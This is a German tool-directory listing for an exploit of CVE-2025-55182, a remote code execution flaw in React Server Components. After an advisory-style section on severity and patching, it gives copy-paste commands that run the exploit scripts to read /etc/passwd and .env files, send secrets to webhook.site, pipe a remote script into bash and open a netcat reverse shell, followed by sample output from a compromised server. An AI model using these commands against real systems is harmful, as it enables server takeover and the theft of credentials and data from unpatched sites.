Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Blackash-CVE-2025-55182 — CVE-2025-55182 | Kitploit
Tools/GitHubGitHub/shen771/blackash-cve-2025-55182
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsCommand and ControlLernen & BildungRed TeamingRemote-Access-Tool
GitHubshen771/blackash-cve-2025-55182

Blackash-CVE-2025-55182

303vor 9 MonatenNoch nicht geprüft

CVE-2025-55182

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2025-55182 — Kritische React-Server-Sicherheitslücke

6930a0395ea4b5bfdd70430a_CVE-2025-55182

🧠 Was es ist

  • ⚛️ Ein kritischer Sicherheitsfehler in React Server Components (RSC)
  • 🧨 Verursacht durch unsicheres Deserialisieren
  • 🌐 Ausnutzbar über Netzwerkanfragen
  • 🔓 Keine Authentifizierung erforderlich
  • ☠️ Kann zu Remotecodeausführung (RCE) führen

✅ Das bedeutet, Angreifer könnten mit einer einzigen präparierten Anfrage potenziell beliebigen serverseitigen Code ausführen.


📊 Schweregrad

  • 🔴 CVSS-Score: 10.0 (Kritisch)
  • 🏴‍☠️ Angriffskomplexität: Niedrig
  • 🔑 Erforderliche Berechtigungen: Keine
  • 👤 Benutzerinteraktion: Keine
  • 💥 Auswirkung: Vollständige Systemkompromittierung möglich

📦 Betroffene Technologien

⚠️ Systeme, die React Server Components verwenden, einschließlich:

  • ✅ React-Server-DOM-Pakete

  • ✅ Frameworks, die RSC bündeln, wie z. B.:

Tool herunterladen
  • Next.js (App Router + RSC)
  • Vite RSC-Plugins
  • Parcel RSC-Tools
  • Redwood, Waku usw.
  • ❌ Nicht betroffen:

    • Reine clientseitige React-Apps
    • Apps, die KEINE Server Components verwenden

    🔥 Warum das gefährlich ist

    • 🧑‍💻 Angreifer können Befehle auf Ihrem Server ausführen
    • 🗃️ Potenzial zum Stehlen von Datenbanken und Geheimnissen
    • 🦠 Kann zur Installation von Ransomware oder Hintertüren genutzt werden
    • 🔄 Kann laterale Bewegungen innerhalb der Infrastruktur ermöglichen
    • 🚀 Ausnutzbar im großen Maßstab

    🛠️ Was sofort zu tun ist

    ✅ 1. Patchen und aktualisieren

    • ⬆️ React auf gepatchte Versionen aktualisieren
    • ⬆️ Next.js oder jedes RSC-basierte Framework aktualisieren

    ✅ 2. Abhängigkeitsprüfung

    • 🔍 Nach transitiven verwundbaren Paketen suchen

    • 🧾 Verwenden:

      • npm audit
      • pnpm audit
      • yarn audit

    ✅ 3. Vorübergehende Abschirmung (kein vollständiger Fix)

    • 🛡️ WAF-Regeln
    • 🔐 Anforderungsvalidierungsfilter
    • 🚫 Verdächtige Payloads blockieren

    ⚠️ Diese verringern nur das Risiko – sie ersetzen KEINEN Patch


    👥 Wen sollte das betreffen?

    • ✅ Full-Stack-Entwickler, die Next.js App Router verwenden

    • ✅ DevOps-Teams, die React-SSR-Apps hosten

    • ✅ Sicherheitsingenieure, die Folgendes überwachen:

      • Node.js-Webdienste
      • Edge-Runtimes
      • Serverlose SSR-Apps

    📌 Wichtigste Erkenntnis

    🚨 Wenn Ihre App React Server Components verwendet und nicht gepatcht ist – ist sie möglicherweise bereits vollständig kompromittiert.


    🚨 Hier sind alle schnellen Einzeiler, die Sie jemals brauchen werden (Kopieren & Einfügen → sofortiges Ergebnis):

    CVE-2025-55182.py (grundlegende RCE)

    root@kitploit:~
    # Grundlegende Informationen
    ./CVE-2025-55182.py https://target.com "id"
    ./CVE-2025-55182.py https://target.com "whoami"
    ./CVE-2025-55182.py https://target.com "uname -a"
    
    # Dateien lesen
    ./CVE-2025-55182.py https://target.com "cat /etc/passwd"
    ./CVE-2025-55182.py https://target.com "cat /app/.env"
    
    # Daten exfiltrieren
    ./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"
    
    # Herunterladen und ausführen (falls wget/curl vorhanden)
    ./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"
    

    CVE-2025-55182-revshell.py (sofortige Reverse Shell)

    root@kitploit:~
    # 1. Listener starten (einmalig)
    nc -lvnp 4444
    
    # 2. Auslösen → Shell in <3 Sekunden
    ./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
    

    Das war's buchstäblich.
    Zwei Skripte, diese 8 Befehle → vollständige Kompromittierung jeder ungepatchten Next.js-Website heute.
    Holen Sie sich Ihre Bountys.

    Hier sehen Sie genau, was in Echtzeit passiert, wenn der Exploit funktioniert (100 % ungepatchtes Ziel, 3. Dezember 2025):

    1. Wenn Sie das normale RCE-Skript (CVE-2025-55182.py) ausführen
    Sie geben ein:

    root@kitploit:~
    ./CVE-2025-55182.py https://target.com "whoami"
    

    Sie sehen sofort auf Ihrem Bildschirm:

    root@kitploit:~
    [+] CVE-2025-55182 Exploit
    [+] Target  : https://target.com
    [+] Command : whoami
    [+] Sending payload ...
    [+] Payload delivered successfully!
    [+] HTTP 200 – Command should have executed on the server
    [+] Server response:
    node
    

    → Dieses „node“ (oder was auch immer der Befehl zurückgibt) ist die tatsächliche Ausgabe vom Opfer-Server.
    Wenn Sie id ausführen, sehen Sie die vollständigen uid/gid-Zeilen usw.

    2. Wenn Sie das Reverse-Shell-Skript (CVE-2025-55182-revshell.py) ausführen
    Sie geben ein:

    root@kitploit:~
    ./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
    

    Sie sehen sofort in Ihrem Listener-Terminal:

    root@kitploit:~
    listening on [any] 4444 ...
    connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
    whoami
    node
    pwd
    /app
    ls -la
    total 1234
    drwxr-xr-x 1 node node  4096 Dec  3 12:34 .
    drwxr-xr-x 1 root root  4096 Nov 30 10:11 ..
    -rw-r--r-- 1 node node   420 Dec  3 11:11 .env
    ...
    

    → Vollständige interaktive TTY-Shell als Benutzer node (fast immer der Web-App-Benutzer). Sie besitzen die Box.

    Das war's buchstäblich.
    Wenn Sie eines der obigen sehen → Exploit hat zu 100 % funktioniert.
    Wenn Sie nur HTTP 403/404 oder nichts erhalten → bereits gepatcht oder durch WAF blockiert.

    Jetzt jagen.


    Haftungsausschluss

    Dieser PoC dient nur für autorisierte Sicherheitstests und Bildungszwecke.
    Führen Sie ihn nicht gegen ein System aus, das Ihnen nicht gehört oder für das Sie keine explizite schriftliche Erlaubnis zum Testen haben.
    Unbefugte Nutzung ist illegal und kann zu strafrechtlicher Verfolgung führen.
    Verwenden Sie ihn nur in Ihrem Labor, in Bug-Bounty-Programmen mit klarem Umfang oder bei Zielen, die Ihnen die Erlaubnis gegeben haben.

    Sie sind zu 100 % für Ihre Handlungen verantwortlich.